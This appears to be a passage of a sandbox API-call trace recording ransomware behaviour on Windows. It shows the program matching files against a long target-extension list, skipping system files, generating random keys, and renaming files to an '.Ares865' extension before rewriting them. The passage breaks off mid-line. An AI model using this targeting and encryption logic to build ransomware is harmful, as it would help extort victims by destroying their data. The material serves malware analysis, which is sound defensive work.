[0063.684] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.684] lstrlenW (lpString="dbb") returned 3 [0063.684] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.684] lstrlenW (lpString="vmdk") returned 4 [0063.684] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.684] lstrlenW (lpString="rar") returned 3 [0063.684] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.684] lstrlenW (lpString="zip") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.685] lstrlenW (lpString="tgz") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.685] lstrlenW (lpString="vbox") returned 4 [0063.685] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.685] lstrlenW (lpString="vdi") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.685] lstrlenW (lpString="vhd") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.685] lstrlenW (lpString="vhdx") returned 4 [0063.685] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.685] lstrlenW (lpString="avhd") returned 4 [0063.685] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.685] lstrlenW (lpString="db") returned 2 [0063.685] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.685] lstrlenW (lpString="db2") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.685] lstrlenW (lpString="db3") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.685] lstrlenW (lpString="dbf") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.685] lstrlenW (lpString="mdf") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.685] lstrlenW (lpString="mdb") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.685] lstrlenW (lpString="sql") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.685] lstrlenW (lpString="sqlite") returned 6 [0063.685] lstrcmpiW (lpString1="ue.htm", lpString2="sqlite") returned 1 [0063.685] lstrlenW (lpString="sqlite3") returned 7 [0063.685] lstrcmpiW (lpString1="lue.htm", lpString2="sqlite3") returned -1 [0063.685] lstrlenW (lpString="sqlitedb") returned 8 [0063.685] lstrcmpiW (lpString1="Blue.htm", lpString2="sqlitedb") returned -1 [0063.685] lstrlenW (lpString="xml") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.685] lstrlenW (lpString="$er") returned 3 [0063.685] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.685] lstrlenW (lpString="4dd") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.686] lstrlenW (lpString="4dl") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.686] lstrlenW (lpString="^^^") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.686] lstrlenW (lpString="abs") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.686] lstrlenW (lpString="abx") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.686] lstrlenW (lpString="accdb") returned 5 [0063.686] lstrcmpiW (lpString1="e.htm", lpString2="accdb") returned 1 [0063.686] lstrlenW (lpString="accdc") returned 5 [0063.686] lstrcmpiW (lpString1="e.htm", lpString2="accdc") returned 1 [0063.686] lstrlenW (lpString="accde") returned 5 [0063.686] lstrcmpiW (lpString1="e.htm", lpString2="accde") returned 1 [0063.686] lstrlenW (lpString="accdr") returned 5 [0063.686] lstrcmpiW (lpString1="e.htm", lpString2="accdr") returned 1 [0063.686] lstrlenW (lpString="accdt") returned 5 [0063.686] lstrcmpiW (lpString1="e.htm", lpString2="accdt") returned 1 [0063.686] lstrlenW (lpString="accdw") returned 5 [0063.686] lstrcmpiW (lpString1="e.htm", lpString2="accdw") returned 1 [0063.686] lstrlenW (lpString="accft") returned 5 [0063.686] lstrcmpiW (lpString1="e.htm", lpString2="accft") returned 1 [0063.686] lstrlenW (lpString="adb") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.686] lstrlenW (lpString="adb") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.686] lstrlenW (lpString="ade") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.686] lstrlenW (lpString="adf") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.686] lstrlenW (lpString="adn") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.686] lstrlenW (lpString="adp") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.686] lstrlenW (lpString="alf") returned 3 [0063.686] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.687] lstrlenW (lpString="ask") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0063.687] lstrlenW (lpString="btr") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.687] lstrlenW (lpString="cat") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.687] lstrlenW (lpString="cdb") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.687] lstrlenW (lpString="ckp") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.687] lstrlenW (lpString="cma") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.687] lstrlenW (lpString="cpd") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.687] lstrlenW (lpString="dacpac") returned 6 [0063.687] lstrcmpiW (lpString1="ue.htm", lpString2="dacpac") returned 1 [0063.687] lstrlenW (lpString="dad") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.687] lstrlenW (lpString="dadiagrams") returned 10 [0063.687] lstrcmpiW (lpString1="t Blue.htm", lpString2="dadiagrams") returned 1 [0063.687] lstrlenW (lpString="daschema") returned 8 [0063.687] lstrcmpiW (lpString1="Blue.htm", lpString2="daschema") returned -1 [0063.687] lstrlenW (lpString="db-journal") returned 10 [0063.687] lstrcmpiW (lpString1="t Blue.htm", lpString2="db-journal") returned 1 [0063.687] lstrlenW (lpString="db-shm") returned 6 [0063.687] lstrcmpiW (lpString1="ue.htm", lpString2="db-shm") returned 1 [0063.687] lstrlenW (lpString="db-wal") returned 6 [0063.687] lstrcmpiW (lpString1="ue.htm", lpString2="db-wal") returned 1 [0063.687] lstrlenW (lpString="dbc") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.687] lstrlenW (lpString="dbs") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.687] lstrlenW (lpString="dbt") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.687] lstrlenW (lpString="dbv") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.687] lstrlenW (lpString="dbx") returned 3 [0063.687] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.688] lstrlenW (lpString="dcb") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0063.688] lstrlenW (lpString="dct") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.688] lstrlenW (lpString="dcx") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.688] lstrlenW (lpString="ddl") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.688] lstrlenW (lpString="dlis") returned 4 [0063.688] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.688] lstrlenW (lpString="dp1") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.688] lstrlenW (lpString="dqy") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.688] lstrlenW (lpString="dsk") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.688] lstrlenW (lpString="dsn") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.688] lstrlenW (lpString="dtsx") returned 4 [0063.688] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.688] lstrlenW (lpString="dxl") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.688] lstrlenW (lpString="eco") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.688] lstrlenW (lpString="ecx") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.688] lstrlenW (lpString="edb") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.688] lstrlenW (lpString="epim") returned 4 [0063.688] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.688] lstrlenW (lpString="fcd") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.688] lstrlenW (lpString="fdb") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.688] lstrlenW (lpString="fic") returned 3 [0063.688] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.688] lstrlenW (lpString="flexolibrary") returned 12 [0063.688] lstrcmpiW (lpString1="oft Blue.htm", lpString2="flexolibrary") returned 1 [0063.689] lstrlenW (lpString="fm5") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.689] lstrlenW (lpString="fmp") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.689] lstrlenW (lpString="fmp12") returned 5 [0063.689] lstrcmpiW (lpString1="e.htm", lpString2="fmp12") returned -1 [0063.689] lstrlenW (lpString="fmpsl") returned 5 [0063.689] lstrcmpiW (lpString1="e.htm", lpString2="fmpsl") returned -1 [0063.689] lstrlenW (lpString="fol") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.689] lstrlenW (lpString="fp3") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.689] lstrlenW (lpString="fp4") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.689] lstrlenW (lpString="fp5") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.689] lstrlenW (lpString="fp7") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.689] lstrlenW (lpString="fpt") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.689] lstrlenW (lpString="frm") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.689] lstrlenW (lpString="gdb") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.689] lstrlenW (lpString="gdb") returned 3 [0063.689] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.689] lstrlenW (lpString="grdb") returned 4 [0063.690] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.690] lstrlenW (lpString="gwi") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.690] lstrlenW (lpString="hdb") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.690] lstrlenW (lpString="his") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.690] lstrlenW (lpString="ib") returned 2 [0063.690] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.690] lstrlenW (lpString="idb") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.690] lstrlenW (lpString="ihx") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.690] lstrlenW (lpString="itdb") returned 4 [0063.690] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.690] lstrlenW (lpString="itw") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.690] lstrlenW (lpString="jet") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.690] lstrlenW (lpString="jtx") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.690] lstrlenW (lpString="kdb") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.690] lstrlenW (lpString="kexi") returned 4 [0063.690] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.690] lstrlenW (lpString="kexic") returned 5 [0063.690] lstrcmpiW (lpString1="e.htm", lpString2="kexic") returned -1 [0063.690] lstrlenW (lpString="kexis") returned 5 [0063.690] lstrcmpiW (lpString1="e.htm", lpString2="kexis") returned -1 [0063.690] lstrlenW (lpString="lgc") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.690] lstrlenW (lpString="lwx") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.690] lstrlenW (lpString="maf") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.690] lstrlenW (lpString="maq") returned 3 [0063.690] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.691] lstrlenW (lpString="mar") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.691] lstrlenW (lpString="marshal") returned 7 [0063.691] lstrcmpiW (lpString1="lue.htm", lpString2="marshal") returned -1 [0063.691] lstrlenW (lpString="mas") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.691] lstrlenW (lpString="mav") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.691] lstrlenW (lpString="maw") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.691] lstrlenW (lpString="mdbhtml") returned 7 [0063.691] lstrcmpiW (lpString1="lue.htm", lpString2="mdbhtml") returned -1 [0063.691] lstrlenW (lpString="mdn") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.691] lstrlenW (lpString="mdt") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.691] lstrlenW (lpString="mfd") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.691] lstrlenW (lpString="mpd") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.691] lstrlenW (lpString="mrg") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.691] lstrlenW (lpString="mud") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.691] lstrlenW (lpString="mwb") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.691] lstrlenW (lpString="myd") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.691] lstrlenW (lpString="ndf") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.691] lstrlenW (lpString="nnt") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.691] lstrlenW (lpString="nrmlib") returned 6 [0063.691] lstrcmpiW (lpString1="ue.htm", lpString2="nrmlib") returned 1 [0063.691] lstrlenW (lpString="ns2") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.691] lstrlenW (lpString="ns3") returned 3 [0063.691] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.692] lstrlenW (lpString="ns4") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.692] lstrlenW (lpString="nsf") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.692] lstrlenW (lpString="nv") returned 2 [0063.692] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.692] lstrlenW (lpString="nv2") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.692] lstrlenW (lpString="nwdb") returned 4 [0063.692] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.692] lstrlenW (lpString="nyf") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.692] lstrlenW (lpString="odb") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.692] lstrlenW (lpString="odb") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.692] lstrlenW (lpString="oqy") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.692] lstrlenW (lpString="ora") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.692] lstrlenW (lpString="orx") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.692] lstrlenW (lpString="owc") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.692] lstrlenW (lpString="p96") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.692] lstrlenW (lpString="p97") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.692] lstrlenW (lpString="pan") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.692] lstrlenW (lpString="pdb") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.692] lstrlenW (lpString="pdm") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.692] lstrlenW (lpString="pnz") returned 3 [0063.692] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.692] lstrlenW (lpString="qry") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.693] lstrlenW (lpString="qvd") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.693] lstrlenW (lpString="rbf") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.693] lstrlenW (lpString="rctd") returned 4 [0063.693] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.693] lstrlenW (lpString="rod") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.693] lstrlenW (lpString="rodx") returned 4 [0063.693] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.693] lstrlenW (lpString="rpd") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.693] lstrlenW (lpString="rsd") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0063.693] lstrlenW (lpString="sas7bdat") returned 8 [0063.693] lstrcmpiW (lpString1="Blue.htm", lpString2="sas7bdat") returned -1 [0063.693] lstrlenW (lpString="sbf") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.693] lstrlenW (lpString="scx") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.693] lstrlenW (lpString="sdb") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.693] lstrlenW (lpString="sdc") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.693] lstrlenW (lpString="sdf") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.693] lstrlenW (lpString="sis") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.693] lstrlenW (lpString="spq") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.693] lstrlenW (lpString="te") returned 2 [0063.693] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.693] lstrlenW (lpString="teacher") returned 7 [0063.693] lstrcmpiW (lpString1="lue.htm", lpString2="teacher") returned -1 [0063.693] lstrlenW (lpString="tmd") returned 3 [0063.693] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.693] lstrlenW (lpString="tps") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.694] lstrlenW (lpString="trc") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.694] lstrlenW (lpString="trc") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.694] lstrlenW (lpString="trm") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.694] lstrlenW (lpString="udb") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.694] lstrlenW (lpString="udl") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.694] lstrlenW (lpString="usr") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.694] lstrlenW (lpString="v12") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.694] lstrlenW (lpString="vis") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.694] lstrlenW (lpString="vpd") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.694] lstrlenW (lpString="vvv") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.694] lstrlenW (lpString="wdb") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.694] lstrlenW (lpString="wmdb") returned 4 [0063.694] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.694] lstrlenW (lpString="wrk") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.694] lstrlenW (lpString="xdb") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.694] lstrlenW (lpString="xld") returned 3 [0063.694] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.694] lstrlenW (lpString="xmlff") returned 5 [0063.694] lstrcmpiW (lpString1="e.htm", lpString2="xmlff") returned -1 [0063.694] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.Ares865") returned 92 [0063.694] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\soft blue.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\soft blue.htm.ares865"), dwFlags=0x1) returned 1 [0063.695] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\soft blue.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.695] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0063.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.696] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.696] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.696] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.697] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x164 [0063.707] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0063.708] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.708] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.708] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.709] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.709] CloseHandle (hObject=0x164) returned 1 [0063.709] CloseHandle (hObject=0x154) returned 1 [0063.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.709] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64e9680, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64e9680, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa5b3841, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="aoldtz.exe") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="..") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="windows") returned -1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="bootmgr") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="temp") returned -1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="pagefile.sys") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="boot") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="ids.txt") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="ntuser.dat") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="perflogs") returned 1 [0063.710] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="MSBuild") returned 1 [0063.710] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0063.710] lstrlenW 